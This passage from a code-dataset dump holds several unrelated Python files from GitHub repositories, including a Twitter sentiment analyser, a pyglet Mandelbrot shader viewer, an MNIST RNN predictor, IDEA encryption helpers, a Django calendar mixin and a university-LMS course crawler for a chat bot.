svm_model.fit(X_train, y_train)\r\n model(svm_model)\r\n \r\nsvm()\r\nlogisticRegression() \r\nnaiveBayes() \r\n\r\nconfig = pd.read_csv(\"config.csv\")\r\n \r\n\r\ntwitterApiKey = str(config['twitterApiKey'][0])\r\ntwitterApiSecret = str(config['twitterApiSecret'][0])\r\ntwitterApiAccessToken = str(config['twitterApiAccessToken'][0])\r\ntwitterApiAccessTokenSecret = str(config['twitterApiAccessTokenSecret'][0])\r\n\r\ndef predict_text(text,model):\r\n start_time = time.time()\r\n sentiment=0\r\n sentiment_prob=[[]]\r\n textdata = vectorizer.transform([preprocess(text)])\r\n sentiment = model.predict(textdata)\r\n sentiment_prob = model.predict_proba(textdata) \r\n prob = ('%.2f'%max(max(sentiment_prob*100)))\r\n timer = \"%.2f seconds\" % (time.time() - start_time)\r\n return sentiment[0],timer,prob \r\n\r\n#for tweet prediction by API\r\ndef tweets_of_twitter_user(user_name,no_of_tweets):\r\n config = pd.read_csv(\"config.csv\")\r\n \r\n\r\n twitterApiKey = str(config['twitterApiKey'][0])\r\n twitterApiSecret = str(config['twitterApiSecret'][0])\r\n twitterApiAccessToken = str(config['twitterApiAccessToken'][0])\r\n twitterApiAccessTokenSecret = str(config['twitterApiAccessTokenSecret'][0])\r\n\r\n # Authenticate\r\n auth = tweepy.OAuthHandler(twitterApiKey, twitterApiSecret)\r\n auth.set_access_token(twitterApiAccessToken, twitterApiAccessTokenSecret)\r\n twetterApi = tweepy.API(auth, wait_on_rate_limit = True)\r\n\r\n\r\n twitterAccount = user_name\r\n\r\n tweets = tweepy.Cursor(twetterApi.user_timeline, \r\n screen_name=twitterAccount, \r\n count=None,\r\n since_id=None,\r\n max_id=None,\r\n trim_user=True,\r\n exclude_replies=True,\r\n contributor_details=False,\r\n include_entities=False\r\n ).items(no_of_tweets);\r\n print(tweets)\r\n\r\n tweet_DataBase = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['Tweet'])\r\n \r\n ### DataFrame for the sentiment of the user\r\n sentiment_score=[]\r\n for i in range(0,no_of_tweets):\r\n sentiment_score.append(0)\r\n \r\n for model in [logistic_reg,naive_bayes,svm_model]:\r\n prediction=[]\r\n i=0\r\n current=[]\r\n for tweets in tweet_DataBase[\"Tweet\"]:\r\n sen,timer,prob=predict_text(tweets,model)\r\n \r\n prediction.append(float(prob))\r\n current.append(sen)\r\n sentiment_score[i]=sentiment_score[i]+sen\r\n \r\n i+=1\r\n tweet_DataBase[model]=prediction\r\n \r\n tweet_DataBase[str(model)+\" current\"]=current\r\n \r\n sentiment_score=[\"Positive\" if i>4 else \"Negative\" for i in sentiment_score]\r\n tweet_DataBase.columns=[\"Tweets\",\"log_reg\",\"log_current\",\"naive\",\"naive_current\",\"svm\",\"svm_current\"]\r\n tweet_DataBase.insert(1,\"AVG_Sentiment\",sentiment_score,True)\r\n \r\n avg_accuracy=[]\r\n \r\n for i in range(no_of_tweets):\r\n l=tweet_DataBase['log_reg'][i]\r\n n=tweet_DataBase['naive'][i]\r\n s=tweet_DataBase['svm'][i]\r\n avg=(l+n+s)/3\r\n avg_accuracy.append(float(avg))\r\n \r\n tweet_DataBase[\"AVG_Accuracy\"]=avg_accuracy\r\n #tweet_DataBase.insert(-1,\"AVG_Accuracy\",avg_accuracy,True)\r\n clear_text=[]\r\n for tweet in tweet_DataBase[\"Tweets\"]:\r\n clear_text.append(preprocess(tweet))\r\n tweet_DataBase[\"cleared_text\"]=clear_text \r\n return tweet_DataBase\r\n\r\ndef sentimented_text(d):\r\n posstr = \"\"\r\n negstr= \" \"\r\n for text1 in d.loc[d['AVG_Sentiment'].values == 'Positive']['cleared_text']:\r\n posstr += text1\r\n\r\n\r\n for text2 in d.loc[d['AVG_Sentiment'].values == 'Negative']['cleared_text']:\r\n negstr += text2\r\n\r\n return posstr,negstr\r\n \r\ndef 
predict(model,text):\r\n textdata = vectorizer.transform([preprocess(text)])\r\n sentiment = model.predict(textdata)\r\n print(\"we use it\")\r\n return sentiment[0]\r\n\r\ndef Twitter_account_name(user_name):\r\n account_name=\"\"\r\n twitter = Twitter(auth = OAuth(twitterApiAccessToken,\r\n twitterApiAccessTokenSecret,\r\n twitterApiKey,\r\n twitterApiSecret))\r\n results = twitter.users.search(q = user_name)\r\n \r\n for user in results:\r\n if user[\"screen_name\"]==user_name or user[\"name\"]==user_name :\r\n account_name=user[\"name\"]\r\n return account_name\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alok2244/Sentiment_Analysis-","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10468953576","text":"import ctypes as c\n\nimport pyglet\nimport pyglet.clock\nimport pyglet.window\nfrom pyglet.window import key\nfrom pyglet import gl\n\nvertex_shader = \"\"\"\nuniform float real;\nuniform float w;\nuniform float imag;\nuniform float h;\n\nvarying float xpos;\nvarying float ypos;\n\nvoid main(void)\n{\n xpos = clamp(gl_Vertex.x, 0.0,1.0)*w+real;\n ypos = clamp(gl_Vertex.y, 0.0,1.0)*h+imag;\n\n gl_Position = gl_ModelViewProjectionMatrix * gl_Vertex;\n}\n\"\"\"\n\nfragment_shader = \"\"\"\nvarying float xpos;\nvarying float ypos;\nvarying float zpos;\nvoid main (void)\n{\n float iter = 0.0;\n float max_square = 3.0;\n float square = 0.0;\n float r = 0.0;\n float i = 0.0;\n float rt = 0.0;\n float it = 0.0;\n while(iter < 1.0 && square < max_square)\n {\n rt = (r*r) - (i*i) + xpos;\n it = (2.0 * r * i) + ypos;\n r = rt;\n i = it;\n square = (r*r)+(i*i);\n iter += 0.005;\n }\n gl_FragColor = vec4 (iter, iter, sin(iter*2.00), 1.0);\n}\n\"\"\"\n\nclass ShaderException(Exception):\n pass\n\nclass Shader(object):\n \"\"\"Wrapper to create opengl 2.0 shader programms\"\"\"\n def __init__(self, vertex_source, fragment_source):\n self.program = gl.glCreateProgram()\n self.vertex_shader = self.create_shader(vertex_source,\n gl.GL_VERTEX_SHADER)\n self.fragment_shader = self.create_shader(fragment_source,\n gl.GL_FRAGMENT_SHADER)\n gl.glAttachShader(self.program, self.vertex_shader)\n gl.glAttachShader(self.program, self.fragment_shader)\n gl.glLinkProgram(self.program)\n message = self.get_program_log(self.program)\n if message:\n raise ShaderException(message)\n\n def create_shader(self, source, shadertype):\n # get a char[]\n sbuffer = c.create_string_buffer(source)\n # get a char **\n pointer = c.cast(c.pointer(c.pointer(sbuffer)),\n c.POINTER(c.POINTER(c.c_char)))\n # a long * NULL pointer\n nulll = c.POINTER(c.c_long)()\n shader = gl.glCreateShader(shadertype)\n gl.glShaderSource(shader, 1, pointer, None)\n gl.glCompileShader(shader)\n message = self.get_shader_log(shader)\n if message:\n raise ShaderException(message)\n return shader\n\n def set_uniform_f(self, name, value):\n location = gl.glGetUniformLocation(self.program, name)\n gl.glUniform1f(location, value)\n\n def __setitem__(self, name, value):\n \"\"\"pass a variable to the shader\"\"\"\n if isinstance(value, float):\n self.set_uniform_f(name, value)\n else:\n raise TypeError(\"Only floats are supported so far\")\n\n def use(self):\n gl.glUseProgram(self.program)\n\n def stop(self):\n gl.glUseProgram(0)\n\n def get_shader_log(self, shader):\n return self.get_log(shader, gl.glGetShaderInfoLog)\n\n def get_program_log(self, shader):\n return self.get_log(shader, gl.glGetProgramInfoLog)\n\n def 
get_log(self, obj, func):\n log_buffer = c.create_string_buffer(4096)\n buffer_pointer = c.cast(c.pointer(log_buffer), c.POINTER(c.c_char))\n written = c.c_int()\n func(obj, 4096, c.pointer(written), buffer_pointer)\n return log_buffer.value\n\n\nclass MainWindow(pyglet.window.Window):\n def __init__(self):\n pyglet.window.Window.__init__(self, width=640, height=480,\n resizable=True)\n self.fps = pyglet.clock.ClockDisplay()\n self.shader = Shader(vertex_shader, fragment_shader)\n self.real = -2.0\n self.w = 3.0\n self.imag = -1.0\n self.h = 2.0\n self.show_fps = False\n\n def on_key_press(self, symbol, modifiers):\n if symbol == key.ESCAPE:\n self.has_exit = True\n elif symbol == key.F:\n self.set_fullscreen(not self.fullscreen)\n elif symbol == key.F1:\n self.show_fps = not self.show_fps\n elif symbol == key.F2:\n pyglet.image.get_buffer_manager().get_color_buffer().save('screenshot.png')\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n self.real -= self.w / self.width * dx\n self.imag -= self.h / self.height * dy\n\n def on_mouse_scroll(self, x, y, scroll_x, scroll_y):\n if scroll_y > 0:\n self.real += (float(x) / self.width * self.w) - self.w * 0.25\n self.w *= 0.5\n self.imag += (float(y) / self.height * self.h) - self.h * 0.25\n self.h *= 0.5\n else:\n self.real += (float(x) / self.width * self.w) - self.w\n self.w *= 2.0\n self.imag += (float(y) / self.height * self.h) - self.h\n self.h *= 2.0\n\n def on_resize(self, width, height):\n ratio = float(width) / height\n self.w = ratio * self.h\n pyglet.window.Window.on_resize(self, width, height)\n\n def run(self):\n while not self.has_exit:\n pyglet.clock.tick()\n self.dispatch_events()\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n self.shader.use()\n self.shader[\"real\"] = self.real\n self.shader[\"w\"] = self.w\n self.shader[\"imag\"] = self.imag\n self.shader[\"h\"] = self.h\n gl.glBegin(gl.GL_QUADS)\n gl.glVertex3f(0.0, 0.0, 0.0)\n gl.glVertex3f(0.0, self.height, 0.0)\n gl.glVertex3f(self.width, self.height, 0.0)\n gl.glVertex3f(self.width, 0.0, 0.0)\n gl.glEnd()\n self.shader.stop()\n if self.show_fps:\n self.fps.draw()\n self.flip()\n\ndef main():\n MainWindow().run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gunny26/pygame","sub_path":"pyglet_mandelbrot.py","file_name":"pyglet_mandelbrot.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34145187638","text":"import tensorflow as tf\nimport numpy as np\nfrom mnistRnn.rnn_train import rnn_graph\nfrom mnistRnn.settings import mnist, width, height, rnn_size, out_size\n\n\ndef mnist2text(image_list, height, width, rnn_size, out_size):\n '''\n mnist数字向量转为文本\n :param image_list:\n :param height:\n :param width:\n :param rnn_size:\n :param out_size:\n :return:\n '''\n x = tf.placeholder(tf.float32, [None, height, width])\n y_conv = rnn_graph(x, rnn_size, out_size, width, height)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n predict = tf.argmax(y_conv, 1)\n vector_list = sess.run(predict, feed_dict={x: image_list})\n vector_list = vector_list.tolist()\n return vector_list\n\n\nif __name__ == '__main__':\n batch_x_test = mnist.test.images\n batch_x_test = batch_x_test.reshape([-1, height, width])\n\n batch_y_test = mnist.test.labels\n batch_y_test = list(np.argmax(batch_y_test, 1))\n\n pre_y = list(mnist2text(batch_x_test, height, width, rnn_size, out_size))\n for text in 
zip(batch_y_test, pre_y):  # iterate label/prediction pairs; list.index() returns the first match and mis-maps duplicate labels\n        print('Label:', text[0], ' Predict:', text[1])\n\n","repo_name":"lpty/tensorflow_tutorial","sub_path":"mnistRnn/mnist_rnn.py","file_name":"mnist_rnn.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"37"}
+{"seq_id":"25701847980","text":"# @Project: FinancialDashboard\n# @Filename: ids.py\n# @Author: Daksh\n# @Time: 08-12-2022 10:38 pm\n\n# Stores the ids of all the components\n\nBAR_CHART = \"bar-chart\"\nPIE_CHART = \"pie-chart\"\n\nSELECT_ALL_CATEGORIES_BUTTON = \"select-all-categories-button\"\nCATEGORY_DROPDOWN = \"category-dropdown\"\n\nSELECT_ALL_MONTHS_BUTTON = \"select-all-months-button\"\nMONTH_DROPDOWN = \"month-dropdown\"\n\nYEAR_DROPDOWN = \"year-dropdown\"\nSELECT_ALL_YEARS_BUTTON = \"select-all-years-button\"\n","repo_name":"warlock-spell/Financial-Dashboard-Plotly-Dash","sub_path":"src/components/ids.py","file_name":"ids.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10749294686","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n    @Project: python\n    @Date: 10/14/2018 10:58 AM\n    @Author: xuegangliu\n    @Description: fileTest\n\"\"\"\nimport os\n\ndef test():\n    print(os.getcwd())\n    print(os.listdir())\n    # print(os.path.join(os.getcwd(),os.listdir()[1]))\n\ndef writeFileList():\n    fid = open('fileList.txt', 'w')\n    # rootdir = os.getcwd()\n    rootdir = 'D:\\\\test'\n    print('rootdir = ' + rootdir)\n    pathname = []\n    for (dirpath, dirnames, filenames) in os.walk(rootdir):\n        for filename in filenames:\n            pathname += [os.path.join(dirpath, filename)]\n    for tt in pathname:\n        fid.write(str(tt))\n        fid.write(\"\\n\")\n    fid.close()\n\nif __name__ == '__main__':\n    # test()\n    writeFileList()","repo_name":"xuegangliu/python","sub_path":"sample/fileModule/fileTest.py","file_name":"fileTest.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10348121538","text":"from cryptography.hazmat.primitives.padding import PKCS7\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom server.crypto.idea import do_encode, do_decode\nimport os\nimport json\nimport base64\n\n\ndef wrap_json(data, session_key, session_id):\n    ret, iv = do_encode(data, session_key)\n    rj = {\"sid\": session_id, \"iv\": base64.b64encode(iv).decode(), \"data\": base64.b64encode(ret).decode()}\n    return rj\n\n\ndef unwrap_json(data, session_key, session_id):\n    assert session_id == data[\"sid\"]\n    iv = base64.b64decode(data[\"iv\"])\n    data_enc = base64.b64decode(data[\"data\"])\n    data_bytes = do_decode(data_enc, session_key, iv)\n\n    rj = json.loads(data_bytes)\n    return rj\n\n\ndef encrypt(data, key):\n    padder = PKCS7(64).padder()\n    data_padded = padder.update(data.encode())\n    data_padded += padder.finalize()\n\n    iv = os.urandom(8)\n    enc = Cipher(algorithms.IDEA(key), modes.CBC(iv)).encryptor()\n    ret = iv + enc.update(data_padded)\n    ret += enc.finalize()\n    return base64.b64encode(ret).decode()\n\n\ndef decrypt(data, key):\n    b = base64.b64decode(data)\n    iv, data_enc = b[:8], b[8:]\n    data_bytes = do_decode(data_enc, key, iv)\n    return 
data_bytes.decode()","repo_name":"Proger125/Cryptography","sub_path":"Lab_02/client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39409200286","text":"import calendar\nfrom collections import deque\nimport datetime\n\n# 参考文献: https://blog.narito.ninja/detail/11/\n\nnow = datetime.datetime.now()\n\nclass BaseCalendarMixin:\n \"\"\"カレンダー関連Mixinの、基底クラス\"\"\"\n first_weekday = 0 # 0は月曜から、1は火曜から。6なら日曜日からになります。\n week_names = ['月', '火', '水', '木', '金', '土', '日'] # これは、月曜日から書くことを想定します。['Mon', 'Tue'...\n\n def setup_calendar(self):\n \"\"\"内部カレンダーの設定処理\n calendar.Calendarクラスの機能を利用するため、インスタンス化します。\n Calendarクラスのmonthdatescalendarメソッドを利用していますが、デフォルトが月曜日からで、\n 火曜日から表示したい(first_weekday=1)、といったケースに対応するためのセットアップ処理です。\n \"\"\"\n self._calendar = calendar.Calendar(self.first_weekday)\n\n def get_week_names(self):\n \"\"\"first_weekday(最初に表示される曜日)にあわせて、week_namesをシフトする\"\"\"\n # dequeしたものはrotateメソッドを持つ. deque.rotate(number)で, number分だけ要素を左にずらしていく. \n week_names = deque(self.week_names)\n week_names.rotate(-self.first_weekday) \n return week_names\n\n\nclass MonthCalendarMixin(BaseCalendarMixin):\n \"\"\"月間カレンダーの機能を提供するMixin\"\"\"\n def get_previous_month(self, date):\n \"\"\"前月を返す\"\"\"\n if date.month == 1:\n return date.replace(year=date.year-1, month=12, day=1)\n else:\n return date.replace(month=date.month-1, day=1)\n\n def get_next_month(self, date):\n \"\"\"次月を返す\"\"\"\n if date.month == 12:\n return date.replace(year=date.year+1, month=1, day=1)\n else:\n return date.replace(month=date.month+1, day=1)\n\n def get_month_days(self, date):\n \"\"\"その月の全ての日を返す\"\"\"\n # 帰ってくるのはdatetime型が格納された配列\n # monthdatescalendarは, pythonに組み込まれている. 
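Returns the month as a list of weeks; each week is a list of seven datetime.date objects.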
\n return self._calendar.monthdatescalendar(date.year, date.month)\n\n def get_current_month(self, _month, _year):\n \"\"\"現在の月を返す\"\"\"\n # 引数の渡し方を変える\n month = _month\n year = _year\n\n # month = self.kwargs.get('month')\n # year = self.kwargs.get('year')\n if month and year:\n month = datetime.date(year=int(year), month=int(month), day=1)\n else:\n month = datetime.date.today().replace(day=1)\n return month\n\n def get_month_calendar(self, _month, _year):\n \"\"\"月間カレンダー情報の入った辞書を返す\"\"\"\n self.setup_calendar()\n current_month = self.get_current_month(_month, _year)\n calendar_data = {\n 'now': datetime.date.today(),\n 'month_days': self.get_month_days(current_month),\n 'month_current': current_month,\n 'month_previous': self.get_previous_month(current_month),\n 'month_next': self.get_next_month(current_month),\n 'week_names': self.get_week_names(),\n }\n return calendar_data\n\ndef week_name_test():\n demo_calendar = BaseCalendarMixin()\n week_names = deque(demo_calendar.week_names)\n week_names.rotate(1)\n print(week_names)\n\ndef month_days_test():\n demo_calendar = MonthCalendarMixin()\n demo_calendar.setup_calendar()\n print(demo_calendar.get_month_days(now))\n\ndef current_month_test():\n demo_calendar = MonthCalendarMixin()\n print(demo_calendar.get_current_month(now.month, now.year))\n\ndef month_calendar_test():\n demo_calendar = MonthCalendarMixin()\n print(demo_calendar.get_month_calendar(now.month, now.year))\n\n# week_name_test()\n# month_days_test()\n# current_month_test()\nmonth_calendar_test()","repo_name":"Yeongse/sunsun","sub_path":"shift/tests/calendar_test.py","file_name":"calendar_test.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22227766717","text":"from BotApp.models import *\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom CE99Bot.config import *\nfrom .UserCourseCUBE import apply as user_course_cube_apply\n\ndef login(username, password):\n url = 'https://lms.iust.ac.ir/login/index.php'\n with requests.session() as session:\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'lxml')\n url = soup.find(class_=\"btn btn-primary btn-block\")['href']\n response = session.get(url)\n data = {\n 'name': username,\n \"pass\": password,\n # \"form_build_id\": \"form-I0t7Yj6NBHjmQPhNqOaulhhjaf4BEqcKxpTDZbfwYvk\",\n \"form_id\": \"oauth2_server_authenticate_form\",\n \"op\": \"ورود\"\n }\n response = session.post('https://its.iust.ac.ir/oauth2/autheticate', data=data)\n if response.status_code == 200:\n return session\n else:\n return None\n\n\ndef crawl_user_info(session, user):\n # Get the user's info\n try:\n response = session.get('https://lms.iust.ac.ir/user/profile.php')\n soup = BeautifulSoup(response.text, 'lxml')\n full_name = soup.find(class_=\"contentnode fullname\").span.text\n student_id = soup.find(class_=\"contentnode idnumber aduseropt\").dd.text.strip('S:')\n department = soup.find(class_=\"contentnode department aduseropt\").dd.text\n return {\"status\": \"OK\", \"session\": session, \"soup\": soup, \"full_name\": full_name, \"student_id\": student_id, \"department\": department}\n except:\n return {\"status\": \"Error\", \"session\": session}\n\n\ndef set_user_info(user, user_info, departments, statuses):\n status = user_info['status']\n\n if status == 'OK':\n user.full_name = user_info['full_name']\n user.student_id = user_info['student_id']\n\n if user_info['department'] in departments:\n user.department = 
departments.get(user_info['department'])\n else:\n new_department = Department.objects.create(name=user_info['department'])\n user.department = new_department\n departments[user_info['department']] = new_department\n\n user.status = statuses.get('correct')\n user.save()\n return {\"status\": \"correct\"}\n\n elif status == 'Error':\n return {\"status\": \"error\"}\n\n\ndef crawl_course_info(session, soup):\n all_courses = {course.name: course for course in Course.objects.all()}\n # Get the user's courses\n dic_course = {}\n courses = soup.find('li', class_=\"contentnode courseprofiles\").find_all('a')\n response = session.get(courses[-1]['href'])\n soup = BeautifulSoup(response.text, 'lxml')\n courses = soup.find('li', class_=\"contentnode courseprofiles\").find_all('a')\n for i in range(len(courses)):\n course = courses[i]\n course_id = course['href'].split(\"&course=\")[1].split(\"&\")[0]\n course_name = course.text\n course_term = course_name.split(\" \")[-1]\n course_term = course_term[1:len(course_term) - 1]\n course_view_link = BASE_VIEW_LINK + course_id \n course_info_link = BASE_INFO_LINK + course_id\n course_is_active = False\n dic_course[course_name] = {\"crawled\":False, \"id\": course_id, \"term\": course_term, \"view_link\": course_view_link, \"info_link\": course_info_link, \"is_active\": course_is_active}\n if course_name in all_courses: \n dic_course[course_name][\"crawled\"] = True\n\n response = session.get(course_view_link)\n soup = BeautifulSoup(response.text, 'lxml')\n # Get the user's courses' view link\n if soup.find(id=\"editingbutton\"):\n dic_course[course_name]['user_course_type'] = \"TA\"\n else:\n dic_course[course_name]['user_course_type'] = \"student\"\n try:\n adobe = soup.find(class_=\"activity adobeconnect modtype_adobeconnect\").find('a')['href']\n # https://lms.iust.ac.ir/mod/adobeconnect/view.php?id=413574\n response = session.get(adobe)\n soup = BeautifulSoup(response.text, 'lxml')\n class_time = soup.find(class_=\"aconmeetinforow\").find_all(\n class_=\"aconlabeltitle\")[-1].text\n d_c = class_time.split('از ساعت')\n days = d_c[0].split('زمان تشکیل جلسه :هر')[-1].split(' و ')\n days_list = []\n for day in days:\n day = day.strip(' ')\n days_list.append(day)\n clock = d_c[-1].split(' ')[1]\n dic_course[course_name]['days'] = days_list\n dic_course[course_name]['clock'] = clock\n dic_course[course_name]['is_active'] = True\n except:\n dic_course[course_name]['days'] = None\n dic_course[course_name]['clock'] = None\n\n return dic_course \n\n\ndef set_user_courses(user, course_info, courses):\n terms = {term.name: term for term in Term.objects.all()}\n user_courses = {user_course.course: user_course for user_course in UserCourse.objects.all().filter(user=user)}\n days = {day.name: day for day in Day.objects.all()}\n clocks = {clock.time: clock for clock in ClockTime.objects.all()}\n user_course_type = {usertype.name: usertype for usertype in UserCourseType.objects.all()}\n\n\n for course_name, course in course_info.items():\n if course['crawled']:\n course_obj = Course.objects.get(name=course_name)\n if course_obj not in user_courses:\n user_type = user_course_type.get(course['user_course_type'])\n user_course = UserCourse.objects.create(user=user, course=course_obj, user_type=user_type)\n user_courses[course_obj] = user_course\n continue\n \n term = None\n if course['term'] in terms:\n term = terms.get(course['term'])\n elif course['term']:\n new_term = Term.objects.create(name=course['term'])\n term = new_term\n terms[course['term']] = new_term\n\n if 
course_name in courses:\n course_obj = courses.get(course_name)\n else:\n course_obj = Course.objects.create(name=course_name, code=course['id'], term=term)\n courses[course_name] = course_obj\n\n if course['clock'] in clocks:\n clock_obj = clocks.get(course['clock'])\n elif course['clock']:\n new_clock = ClockTime.objects.create(time=course['clock'])\n clock_obj = new_clock\n clocks[course['clock']] = new_clock\n\n if course['days']:\n for day in course['days']:\n if day in days:\n day_obj = days.get(day)\n elif day:\n new_day = Day.objects.create(name=day)\n day_obj = new_day\n days[day] = new_day\n\n course_day_clocktime = CourseDayClockTime.objects.filter(course=course_obj, day=day_obj, clock_time=clock_obj)\n if not course_day_clocktime:\n CourseDayClockTime.objects.create(course=course_obj, day=day_obj, clock_time=clock_obj)\n \n\n if course_obj in user_courses:\n user_course = user_courses.get(course_obj)\n else:\n user_type = user_course_type.get(course['user_course_type'])\n user_course = UserCourse.objects.create(user=user, course=course_obj, user_type=user_type)\n user_courses[course_obj] = user_course\n \n\ndef crawl_teachers_info():\n # login\n session = login(USERNAME, PASSWORD)\n if not session:\n return None\n print(USERNAME, \"login!\")\n print(\"Getting teacher courses...\")\n # Get the user's courses' info link\n dic_course = {}\n courses = Course.objects.all().filter(teacher__isnull=True)\n for course in courses:\n course_name = course.name\n course_id = course.code\n course_info_link = BASE_INFO_LINK + course_id\n dic_course[course_name] = {\"id\": course_id}\n try:\n response = session.get(course_info_link)\n soup = BeautifulSoup(response.text, 'lxml')\n teacher = soup.find(class_=\"teachers\").find('a')\n teacher_name = teacher.text\n teacher_id = teacher['href'].split('id=')[-1].split('&')[0]\n dic_course[course_name]['teacher_name'] = teacher_name\n dic_course[course_name]['teacher_id'] = teacher_id\n except:\n dic_course[course_name]['teacher_name'] = None\n dic_course[course_name]['teacher_id'] = None \n\n return set_courses_teacher(dic_course) \n\n\ndef set_courses_teacher(course_info):\n print(\"Setting teacher courses...\")\n selected_courses = Course.objects.all().filter(teacher__isnull=True)\n courses = {course.name: course for course in selected_courses}\n teachers = {teacher.lms_id: teacher for teacher in Teacher.objects.all()}\n\n for course_name, course in courses.items():\n teacher = None\n curr_course_info = course_info.get(course_name)\n if not curr_course_info:\n continue\n if curr_course_info['teacher_id'] in teachers:\n teacher = teachers.get(curr_course_info['teacher_id'])\n elif curr_course_info['teacher_id']:\n teacher = Teacher.objects.create(name=curr_course_info['teacher_name'], lms_id=curr_course_info['teacher_id'])\n teachers[curr_course_info['teacher_id']] = teacher \n\n course.teacher = teacher\n \n selected_courses.bulk_update(selected_courses, ['teacher'])\n user_course_cube_apply()\n\n\ndef create_main_dirs():\n print(\"Creating main directories...\")\n courses = Course.objects.all()\n for course in courses:\n if not Directory.objects.filter(course=course, parent=None).exists():\n Directory.objects.create(name=course.name, parent=None, course=course)\n\n\ndef apply(chat_id):\n user = User.objects.all().filter(chat_id=chat_id).first()\n departments = {department.name: department for department in Department.objects.all()}\n statuses = {status.name: status for status in UserStatus.objects.all()}\n courses = {course.name: course for 
course in Course.objects.all()}\n\n    session = login(user.lms_username, user.lms_password)\n    if not session:\n        user.status = statuses.get('wrong')\n        user.save()\n        print(user.lms_username, \"login failed!\")\n        return 'error'\n\n    print(user.lms_username, \"login!\")\n    print(\"Getting user info...\")\n    user_info = crawl_user_info(session, user)\n    print(\"Setting user info...\")\n    status = set_user_info(user, user_info, departments, statuses)['status']\n    if status == 'error':\n        return 'wrong'\n\n    elif status == 'correct':\n        print(\"Getting user courses...\")\n        course_info = crawl_course_info(session, user_info['soup'])\n        print(\"Setting user courses...\")\n        set_user_courses(user, course_info, courses)\n\n    create_main_dirs()\n    user_course_cube_apply()\n\n    return 'correct'\n\n","repo_name":"mhhasani/CE99bot","sub_path":"CE99Bot/BotApp/scripts/CreateNewUser.py","file_name":"CreateNewUser.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"41573329431","text":"import numpy as np\nimport scipy.fftpack as fftpack\n\n\n# Temporal bandpass filter using the Fast Fourier Transform\ndef fft_filter(video, freq_min, freq_max, fps):\n    fft = fftpack.fft(video, axis=0)\n    frequencies = fftpack.fftfreq(video.shape[0], d=1.0 / fps)\n    # indices of the FFT bins closest to the requested cut-off frequencies\n    bound_low = (np.abs(frequencies - freq_min)).argmin()\n    bound_high = (np.abs(frequencies - freq_max)).argmin()\n    # zero out everything outside the [freq_min, freq_max] band, in both halves of the spectrum\n    fft[:bound_low] = 0\n    fft[bound_high:-bound_high] = 0\n    fft[-bound_low:] = 0\n    iff = fftpack.ifft(fft, axis=0)\n    result = np.abs(iff)\n    result *= 500  # Amplification factor\n\n    return result, fft, frequencies","repo_name":"SijinJohn/HeartRate","sub_path":"Abhishek/eulerian.py","file_name":"eulerian.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"73581532907","text":"import jwt\nfrom django.contrib.auth.models import User, update_last_login\nfrom django.utils.timezone import now\nfrom test_task.settings import SECRET_KEY\n\nfrom .models import AppUser\n\n\nclass AnalyticsMiddleware:\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request):\n\n        response = self.get_response(request)\n        if request.path == '/api/auth/jwt/create/':\n            if 'access' in response.data:\n                token = response.data['access']\n                user_id = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])['user_id']\n                user = User.objects.get(id=user_id)\n                update_last_login(None, user)\n        if request.user.is_authenticated:\n            AppUser.objects.filter(user_id=request.user.id).update(last_activity=now())\n        return response\n","repo_name":"Gumbeat/test_task","sub_path":"test_task/app/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"34805324558","text":"import sys\nfrom amico import Amico\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nrequirements = [req.strip() for req in open('requirements.pip')]\n\nsetup(\n name = 'amico',\n version = Amico.VERSION,\n author = 'David Czarnecki',\n author_email = 'dczarnecki@agoragames.com',\n packages = ['amico'],\n install_requires = requirements,\n url = 'https://github.com/agoragames/amico-python',\n license = 'LICENSE.txt',\n description = 'Relationships (e.g. friendships) backed by Redis.',\n long_description = open('README.md').read(),\n keywords = ['python', 'redis', 'friendships'],\n classifiers = [\n 'Development Status :: 5 - Production/Stable',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Operating System :: POSIX',\n 'Topic :: Communications',\n 'Topic :: System :: Distributed Computing',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: Software Development :: Libraries'\n 